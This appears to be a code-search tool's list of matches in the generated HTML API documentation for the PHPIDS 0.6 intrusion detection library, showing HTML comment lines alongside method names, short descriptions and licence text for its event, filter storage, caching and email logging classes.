356-	<div class="method-header">
357-		<span class="method-title">getFilters</span> (line <span class="line-number">198</span>)
358-	</div> 
359-	
360:	<!-- ========== Info from phpDoc block ========= -->
361-<p class="short-description">Returns list of filter objects</p>
362-	<ul class="tags">
363-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:377 (103/257) OK | Dubious | Bad | Hide 
374-		
375-			
376-	</div>
377:<a name="methodgetImpact" id="getImpact"><!-- --></a>
378-<div class="evenrow">
379-	
380-	<div class="method-header">
381-		<span class="method-title">getImpact</span> (line <span class="line-number">162</span>)
382-	</div> 
383-	
384:	<!-- ========== Info from phpDoc block ========= -->
385-<p class="short-description">Returns calculated impact</p>
386-	<ul class="tags">
387-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:401 (104/257) OK | Dubious | Bad | Hide 
398-		
399-			
400-	</div>
401:<a name="methodgetIterator" id="getIterator"><!-- --></a>
402-<div class="oddrow">
403-	
404-	<div class="method-header">
405-		<span class="method-title">getIterator</span> (line <span class="line-number">223</span>)
406-	</div> 
407-	
408:	<!-- ========== Info from phpDoc block ========= -->
409-<p class="short-description">IteratorAggregate iterator getter</p>
410-<p class="description"><p>Returns an iterator to iterate over the appended filters.</p></p>
411-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:431 (105/257) OK | Dubious | Bad | Hide 
428-					</dl>
429-			
430-	</div>
431:<a name="methodgetName" id="getName"><!-- --></a>
432-<div class="evenrow">
433-	
434-	<div class="method-header">
435-		<span class="method-title">getName</span> (line <span class="line-number">142</span>)
436-	</div> 
437-	
438:	<!-- ========== Info from phpDoc block ========= -->
439-<p class="short-description">Returns event name</p>
440-<p class="description"><p>The name of the event usually is the key of the variable that was  considered to be malicious</p></p>
441-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:456 (106/257) OK | Dubious | Bad | Hide 
453-		
454-			
455-	</div>
456:<a name="methodgetTags" id="getTags"><!-- --></a>
457-<div class="oddrow">
458-	
459-	<div class="method-header">
460-		<span class="method-title">getTags</span> (line <span class="line-number">179</span>)
461-	</div> 
462-	
463:	<!-- ========== Info from phpDoc block ========= -->
464-<p class="short-description">Returns affected tags</p>
465-	<ul class="tags">
466-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:480 (107/257) OK | Dubious | Bad | Hide 
477-		
478-			
479-	</div>
480:<a name="methodgetValue" id="getValue"><!-- --></a>
481-<div class="evenrow">
482-	
483-	<div class="method-header">
484-		<span class="method-title">getValue</span> (line <span class="line-number">152</span>)
485-	</div> 
486-	
487:	<!-- ========== Info from phpDoc block ========= -->
488-<p class="short-description">Returns event value</p>
489-	<ul class="tags">
490-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Factory.php.html:5 (108/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Factory.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Factory.php.html:22 (109/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:5 (110/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Email.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:23 (111/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:72 (112/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:83 (113/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Converter.php.html:5 (114/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Converter.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Converter.php.html:22 (115/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:5 (116/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page File.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:23 (117/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:72 (118/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:83 (119/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Monitor.php.html:5 (120/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Monitor.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Monitor.php.html:22 (121/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:5 (122/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Filter_Storage</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:24 (123/257) OK | Dubious | Bad | Hide 
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Filter Storage</p>
26-<p class="description"><p>This class provides various default functions for gathering filter patterns  to be used later on by the detection mechanism. You might extend this class  to your requirements.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:140 (124/257) OK | Dubious | Bad | Hide 
137-							
138-					</div>
139-		<div class="info-box-body">
140:			<a name="var$cache" id="$cache"><!-- --></A>
141-<div class="evenrow">
142-
143-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:151 (125/257) OK | Dubious | Bad | Hide 
148-		</span>
149-	</div>
150-
151:	<!-- ========== Info from phpDoc block ========= -->
152-<p class="short-description">Cache container</p>
153-	<ul class="tags">
154-				<li><span class="field">var:</span> wrapper</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:163 (126/257) OK | Dubious | Bad | Hide 
160-		
161-
162-</div>
163:<a name="var$cacheSettings" id="$cacheSettings"><!-- --></A>
164-<div class="oddrow">
165-
166-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:174 (127/257) OK | Dubious | Bad | Hide 
171-		</span>
172-	</div>
173-
174:	<!-- ========== Info from phpDoc block ========= -->
175-<p class="short-description">Holds caching settings</p>
176-	<ul class="tags">
177-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:185 (128/257) OK | Dubious | Bad | Hide 
182-		
183-
184-</div>
185:<a name="var$filterSet" id="$filterSet"><!-- --></A>
186-<div class="evenrow">
187-
188-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:196 (129/257) OK | Dubious | Bad | Hide 
193-		</span>
194-	</div>
195-
196:	<!-- ========== Info from phpDoc block ========= -->
197-<p class="short-description">Filter container</p>
198-	<ul class="tags">
199-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:207 (130/257) OK | Dubious | Bad | Hide 
204-		
205-
206-</div>
207:<a name="var$source" id="$source"><!-- --></A>
208-<div class="oddrow">
209-
210-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:218 (131/257) OK | Dubious | Bad | Hide 
215-		</span>
216-	</div>
217-
218:	<!-- ========== Info from phpDoc block ========= -->
219-<p class="short-description">Filter source file</p>
220-	<ul class="tags">
221-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:245 (132/257) OK | Dubious | Bad | Hide 
242-		<div class="info-box-body">
243-			<A NAME='method_detail'></A>
244-
245:<a name="method__construct" id="__construct"><!-- --></a>
246-<div class="evenrow">
247-	
248-	<div class="method-header">
249-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">92</span>)
250-	</div> 
251-	
252:	<!-- ========== Info from phpDoc block ========= -->
253-<p class="short-description">Constructor</p>
254-<p class="description"><p>Loads filters based on provided IDS_Init settings.</p></p>
255-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:276 (133/257) OK | Dubious | Bad | Hide 
273-		
274-			
275-	</div>
276:<a name="methodaddFilter" id="addFilter"><!-- --></a>
277-<div class="oddrow">
278-	
279-	<div class="method-header">
280-		<span class="method-title">addFilter</span> (line <span class="line-number">155</span>)
281-	</div> 
282-	
283:	<!-- ========== Info from phpDoc block ========= -->
284-<p class="short-description">Adds a filter</p>
285-	<ul class="tags">
286-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:305 (134/257) OK | Dubious | Bad | Hide 
302-		
303-			
304-	</div>
305:<a name="methodgetFilterFromJson" id="getFilterFromJson"><!-- --></a>
306-<div class="evenrow">
307-	
308-	<div class="method-header">
309-		<span class="method-title">getFilterFromJson</span> (line <span class="line-number">290</span>)
310-	</div> 
311-	
312:	<!-- ========== Info from phpDoc block ========= -->
313-<p class="short-description">Loads filters from Json file using ext/Json</p>
314-<p class="description"><p>This function parses the provided source file and stores the result.  If caching mode is enabled the result will be cached to increase  the performance.</p></p>
315-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:331 (135/257) OK | Dubious | Bad | Hide 
328-		
329-			
330-	</div>
331:<a name="methodgetFilterFromXML" id="getFilterFromXML"><!-- --></a>
332-<div class="oddrow">
333-	
334-	<div class="method-header">
335-		<span class="method-title">getFilterFromXML</span> (line <span class="line-number">190</span>)
336-	</div> 
337-	
338:	<!-- ========== Info from phpDoc block ========= -->
339-<p class="short-description">Loads filters from XML using SimpleXML</p>
340-<p class="description"><p>This function parses the provided source file and stores the result.  If caching mode is enabled the result will be cached to increase  the performance.</p></p>
341-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:357 (136/257) OK | Dubious | Bad | Hide 
354-		
355-			
356-	</div>
357:<a name="methodgetFilterSet" id="getFilterSet"><!-- --></a>
358-<div class="evenrow">
359-	
360-	<div class="method-header">
361-		<span class="method-title">getFilterSet</span> (line <span class="line-number">143</span>)
362-	</div> 
363-	
364:	<!-- ========== Info from phpDoc block ========= -->
365-<p class="short-description">Returns registered filters</p>
366-	<ul class="tags">
367-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:381 (137/257) OK | Dubious | Bad | Hide 
378-		
379-			
380-	</div>
381:<a name="methodsetFilterSet" id="setFilterSet"><!-- --></a>
382-<div class="oddrow">
383-	
384-	<div class="method-header">
385-		<span class="method-title">setFilterSet</span> (line <span class="line-number">129</span>)
386-	</div> 
387-	
388:	<!-- ========== Info from phpDoc block ========= -->
389-<p class="short-description">Sets the filter array</p>
390-	<ul class="tags">
391-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:5 (138/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Interface</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:23 (139/257) OK | Dubious | Bad | Hide 
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">Caching wrapper interface</p>
25-	<ul class="tags">
26-				<li><span class="field">author:</span> Lars Strojny &lt;<a href="mailto:lars@strojny.net">lars@strojny.net</a>&gt;</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:84 (140/257) OK | Dubious | Bad | Hide 
81-		<div class="info-box-body">
82-			<A NAME='method_detail'></A>
83-
84:<a name="methodgetCache" id="getCache"><!-- --></a>
85-<div class="oddrow">
86-	
87-	<div class="method-header">
88-		<span class="method-title">getCache</span> (line <span class="line-number">64</span>)
89-	</div> 
90-	
91:	<!-- ========== Info from phpDoc block ========= -->
92-<p class="short-description">Interface method</p>
93-	<ul class="tags">
94-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:108 (141/257) OK | Dubious | Bad | Hide 
105-		
106-			
107-	</div>
108:<a name="methodsetCache" id="setCache"><!-- --></a>
109-<div class="evenrow">
110-	
111-	<div class="method-header">
112-		<span class="method-title">setCache</span> (line <span class="line-number">57</span>)
113-	</div> 
114-	
115:	<!-- ========== Info from phpDoc block ========= -->
116-<p class="short-description">Interface method</p>
117-	<ul class="tags">
118-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Report.php.html:5 (142/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Report.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Report.php.html:22 (143/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching.html:5 (144/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching.html:23 (145/257) OK | Dubious | Bad | Hide 
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">Caching factory</p>
25-<p class="description"><p>This class is used as a factory to load the correct concrete caching  implementation.</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching.html:79 (146/257) OK | Dubious | Bad | Hide 
76-		</div>
77-		<div class="info-box-body">
78-			<A NAME='method_detail'></A>
79:<a name="methodfactory" id="factory"><!-- --></a>
80-<div class="evenrow">
81-	
82-	<div class="method-header">
83-		<span class="method-title">static method factory</span> (line <span class="line-number">62</span>)
84-	</div> 
85-	
86:	<!-- ========== Info from phpDoc block ========= -->
87-<p class="short-description">Factory method</p>
88-	<ul class="tags">
89-				<li><span class="field">return:</span> caching facility</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:5 (147/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Email</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:28 (148/257) OK | Dubious | Bad | Hide 
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Log_Interface.html">IDS_Log_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">Email logging wrapper</p>
30-<p class="description"><p>The Email wrapper is designed to send reports via email. It implements the  singleton pattern.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:108 (149/257) OK | Dubious | Bad | Hide 
105-		</div>
106-		<div class="info-box-body">
107-			<A NAME='method_detail'></A>
108:<a name="methodgetInstance" id="getInstance"><!-- --></a>
109-<div class="evenrow">
110-	
111-	<div class="method-header">
112-		<span class="method-title">static method getInstance</span> (line <span class="line-number">182</span>)
113-	</div> 
114-	
115:	<!-- ========== Info from phpDoc block ========= -->
116-<p class="short-description">Returns an instance of this class</p>
117-<p class="description"><p>This method allows the passed argument to be either an instance of  IDS_Init or an array.</p></p>
118-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:140 (150/257) OK | Dubious | Bad | Hide 
137-			
138-	</div>
139-
140:<a name="method__construct" id="__construct"><!-- --></a>
141-<div class="oddrow">
142-	
143-	<div class="method-header">
144-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">146</span>)
145-	</div> 
146-	
147:	<!-- ========== Info from phpDoc block ========= -->
148-<p class="short-description">Constructor</p>
149-	<ul class="tags">
150-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:169 (151/257) OK | Dubious | Bad | Hide 
166-		
167-			
168-	</div>
169:<a name="methodexecute" id="execute"><!-- --></a>
170-<div class="evenrow">
171-	
172-	<div class="method-header">
173-		<span class="method-title">execute</span> (line <span class="line-number">316</span>)
174-	</div> 
175-	
176:	<!-- ========== Info from phpDoc block ========= -->
177-<p class="short-description">Sends the report to registered recipients</p>
178-	<ul class="tags">
179-				<li><span class="field">throws:</span> Exception if data is no string</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:205 (152/257) OK | Dubious | Bad | Hide 
202-					</dl>
203-			
204-	</div>
205:<a name="methodisSpamAttempt" id="isSpamAttempt"><!-- --></a>
206-<div class="oddrow">
207-	
208-	<div class="method-header">
209-		<span class="method-title">isSpamAttempt</span> (line <span class="line-number">210</span>)
210-	</div> 
211-	
212:	<!-- ========== Info from phpDoc block ========= -->
213-<p class="short-description">Detects spam attempts</p>
214-<p class="description"><p>To avoid mail spam through this logging class this function is used  to detect such attempts based on the alert frequency.</p></p>
215-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:230 (153/257) OK | Dubious | Bad | Hide 
227-		
228-			
229-	</div>
230:<a name="methodprepareData" id="prepareData"><!-- --></a>
231-<div class="evenrow">
232-	
233-	<div class="method-header">
234-		<span class="method-title">prepareData</span> (line <span class="line-number">270</span>)
235-	</div> 
236-	
237:	<!-- ========== Info from phpDoc block ========= -->
238-<p class="short-description">Prepares data</p>
239-<p class="description"><p>Converts given data into a format that can be read in an email.  You might edit this method to your requirements.</p></p>
240-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:260 (154/257) OK | Dubious | Bad | Hide 
257-		
258-			
259-	</div>
260:<a name="methodsend" id="send"><!-- --></a>
261-<div class="oddrow">
262-	
263-	<div class="method-header">
264-		<span class="method-title">send</span> (line <span class="line-number">385</span>)
265-	</div> 
266-	
267:	<!-- ========== Info from phpDoc block ========= -->
268-<p class="short-description">Sends an email</p>
269-	<ul class="tags">
270-				<li><span class="field">access:</span> protected</li>
